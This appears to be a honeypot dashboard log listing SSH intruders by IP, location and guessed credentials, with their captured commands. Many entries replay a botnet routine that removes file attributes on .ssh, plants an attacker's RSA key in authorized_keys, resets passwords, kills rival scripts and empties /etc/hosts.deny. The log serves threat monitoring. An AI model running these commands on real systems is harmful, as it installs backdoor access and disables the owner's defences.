โ†ณ SSH key persistence
๐ŸŽญ brisk_dragon_root (114.254.1.141) โ€” Beijing, China ยท 1 session ยท 2 cmds
2026-06-15 17:01 EDT ยท as oracle/welcome123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ baroque_lantern_root (39.97.53.147) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-06-15 16:58 EDT ยท as admin/admin
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ vapor_cipher_sol (91.92.40.27) โ€” Varna, Bulgaria ยท 27 sessions ยท 27 cmds
2026-06-15 15:07 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ rogue_dutch_root (45.153.34.235) โ€” Eygelshoven, The Netherlands ยท 74 sessions ยท 74 cmds
2026-05-17 03:02 EDT ยท as admin/123456, admin/admin123, admin/password
Ran uname 64x across 64 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—74
๐ŸŽญ vapor_rogue_root (91.92.40.44) โ€” Varna, Bulgaria ยท 27 sessions ยท 27 cmds
2026-06-15 07:39 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ arctic_tulip_root (192.109.200.78) โ€” Eygelshoven, The Netherlands ยท 101 sessions ยท 101 cmds
2026-05-12 14:21 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 105x across 105 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—101
๐ŸŽญ venomous_specter_root (212.154.234.9) โ€” Pavlodar, Kazakhstan ยท 1 session ยท 20 cmds
2026-06-15 05:49 EDT ยท as ubuntu/ubuntu
cd ~; chattr -ia .ssh โ†’ cd ~ && rm -rf .ssh && mkdir .ssh โ†’ echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv" โ†’ echo "ubuntu\nMR9qRSkKiTrH\nMR9qRS
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "ubuntu\nMR9qRSkKiTrH\nMR9qRSkKiTrH"|passwd|bash
$ Enter new UNIX password:
$ echo "ubuntu\nMR9qRSkKiTrH\nMR9qRSkKiTrH\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ rogue_mekong_sol (36.50.135.229) โ€” Ho Chi Minh City, Vietnam ยท 1 session ยท 2 cmds
2026-06-15 03:58 EDT ยท as oracle/Pa$$w0rd
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ ashen_dragon_root_155 (120.48.163.155) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-06-15 03:28 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ brazen_rendang_root (36.74.236.62) โ€” Jember, Indonesia ยท 2 sessions ยท 4 cmds
2026-06-15 02:04 EDT ยท as oracle/12345678, oracle/oracle@2026
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ weary_rogue_root (91.92.40.25) โ€” Varna, Bulgaria ยท 27 sessions ยท 27 cmds
2026-06-14 21:11 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 3x across 3 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ midnight_komodo_crypto (103.158.13.181) โ€” Bojonegoro, Indonesia ยท 1 session ยท 1 cmd
2026-06-14 21:25 EDT ยท as bitcoin/bitcoin
privilege check
$ whoami
โ†ณ privilege check
๐ŸŽญ silent_volcano_crypto (103.158.13.89) โ€” Bojonegoro, Indonesia ยท 1 session ยท 1 cmd
2026-06-14 20:53 EDT ยท as bitcoin/bitcoin
privilege check
$ whoami
โ†ณ privilege check
๐ŸŽญ arctic_monsoon_root (103.24.63.85) โ€” Mumbai, India ยท 10 sessions ยท 10 cmds
2026-06-14 19:35 EDT ยท as admin/admin123, docker/docker123, mysql/mysql
Ran uname 8x across 8 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—10
๐ŸŽญ weary_harbor_root (118.193.34.5) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-06-14 20:02 EDT ยท as oracle/Oracle@123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ feral_hawker_root (8.219.190.201) โ€” Singapore, Singapore ยท 12 sessions ยท 12 cmds
2026-06-14 10:30 EDT ยท as admin/admin, admin/admin123, deploy/deploy
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—12
๐ŸŽญ murky_panda_root (117.50.177.222) โ€” Beijing, China ยท 23 sessions ยท 23 cmds
2026-05-19 23:05 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 14x across 14 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—23
๐ŸŽญ obsidian_sphinx_root (197.199.224.52) โ€” Al Qฤhirah al Jadฤซdah, Egypt ยท 1 session ยท 2 cmds
2026-06-14 07:32 EDT ยท as oracle/oracle123#
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ sneaky_dragon_root (101.126.54.66) โ€” Chaowai, China ยท 1 session ยท 20 cmds
2026-06-14 07:13 EDT ยท as oracle/0
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "0\nw1ayoNZhIJUW\nw1ayoNZhIJUW"|passwd|bash
$ Enter new UNIX password:
$ echo "0\nw1ayoNZhIJUW\nw1ayoNZhIJUW\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ crimson_paella_root (196.196.150.4) โ€” Valencia, Spain ยท 1 session ยท 2 cmds
2026-06-14 06:58 EDT ยท as oracle/Oracle@2026
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ restless_burger_root_217 (144.126.129.217) โ€” St Louis, United States ยท 1 session ยท 2 cmds
2026-06-14 06:22 EDT ยท as root/toor
hostname discovery โ†’ free
$ hostname
โ†ณ hostname discovery
$ free -m | awk '/Mem:/ {print $2}'
๐ŸŽญ derelict_star_root_194 (34.123.134.194) โ€” Council Bluffs, United States ยท 1 session ยท 2 cmds
2026-06-14 00:56 EDT ยท as oracle/oracle123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ brisk_lucha_root (187.140.79.156) โ€” Celaya, Mexico ยท 1 session ยท 2 cmds
2026-06-13 21:44 EDT ยท as oracle/Oracle123!
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ sullen_jade_root (121.229.9.97) โ€” Nanjing, China ยท 1 session ยท 2 cmds
2026-06-13 16:46 EDT ยท as oracle/asd123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ feral_padthai_root (147.50.227.79) โ€” Huai Khwang, Thailand ยท 1 session ยท 2 cmds
2026-06-13 16:35 EDT ยท as oracle/asd123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ aloof_strudel_root_24 (167.71.54.24) โ€” Frankfurt am Main, Germany ยท 2 sessions ยท 22 cmds
2026-06-13 15:31 EDT ยท as mysql/mysql, oracle/oracle12
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "mysql\npT5GTD4AdxeV\npT5GTD4AdxeV"|passwd|bash
$ Enter new UNIX password:
$ echo "mysql\npT5GTD4AdxeV\npT5GTD4AdxeV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ ashen_barbie_root (103.208.219.38) โ€” Surry Hills, Australia ยท 1 session ยท 19 cmds
2026-06-13 15:30 EDT ยท as root/admin
chattr -ia .ssh โ†’ rm -rf .ssh โ†’ mkdir .ssh โ†’ echo "ssh-rsa..." โ†’ cat /proc/cpuinfo | grep name | wc -l โ†’ echo "root:1qZObeeFmpR4"|chpasswd|bash โ†’ rm -rf /tmp/secure.sh โ†’ pkill -9 secure.sh โ†’ pkill -9 auth.sh โ†’ echo >
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:1qZObeeFmpR4"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ feral_liberty_root (20.124.84.235) โ€” Boydton, United States ยท 2 sessions ยท 22 cmds
2026-06-13 14:58 EDT ยท as mysql/mysql, oracle/oracle12
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "mysql\nTIlvDC4GhwCL\nTIlvDC4GhwCL"|passwd|bash
$ Enter new UNIX password:
$ echo "mysql\nTIlvDC4GhwCL\nTIlvDC4GhwCL\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ nocturnal_vespa_root (5.182.34.211) โ€” Roma, Italy ยท 1 session ยท 2 cmds
2026-06-13 13:02 EDT ยท as root/password
hostname discovery โ†’ free
$ hostname
โ†ณ hostname discovery
$ free -m | awk '/^Mem:/ {print $2}'
๐ŸŽญ sullen_nomad_root_51 (185.113.139.51) โ€” Riga, Latvia ยท 1 session ยท 2 cmds
2026-06-13 10:39 EDT ยท as oracle/Oracle@2024
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ nocturnal_kopi_root (152.42.202.161) โ€” Singapore, Singapore ยท 4 sessions ยท 4 cmds
2026-06-13 02:38 EDT ยท as root/password, root/root
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ which ls 2>/dev/null || echo 'missing:ls'; echo '---SEP---'; which ps 2>/dev/null || echo 'missing:ps'; echo '---SEP---'; which cat 2>/dev/null || echo 'missing:cat'; echo '---SEP---'; which netstat 2>/dev/null || echo 'missing:netstat'; echo '---SEP---'; uname -m 2>/dev/null | tr -d '\n\r' || echo 'unknown'; echo '---SEP---'; cat /etc/os-release 2>/dev/null | grep '^NAME=' | cut -d'=' -f2 | tr -d '"' | tr -d '\n\r' || echo 'Linux'; echo '---SEP---'; hostname 2>/dev/null | tr -d '\n\r' || echo 'unknown'; echo '---SEP---'; curl -s --connect-timeout 2 ipinfo.io/country 2>/dev/null | tr -d '\n\r' || echo 'N/A'; echo '---SEP---'; nproc 2>/dev/null | tr -d '\n\r' || echo '1'; echo '---SEP---'; free -h 2>/dev/null | awk '/^Mem:/ {print $2}' | tr -d '\n\r' || echo 'N/A'; echo '---SEP---'; df -h / 2>/dev/null | awk 'NR==2{print $2}' | tr -d '\n\r' || echo 'N/A'; echo '---END---' ร—4
โ†ณ payload download
๐ŸŽญ rabid_panda_root (122.115.224.56) โ€” Beijing, China ยท 1 session ยท 20 cmds
2026-06-13 03:57 EDT ยท as deploy/deploy123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
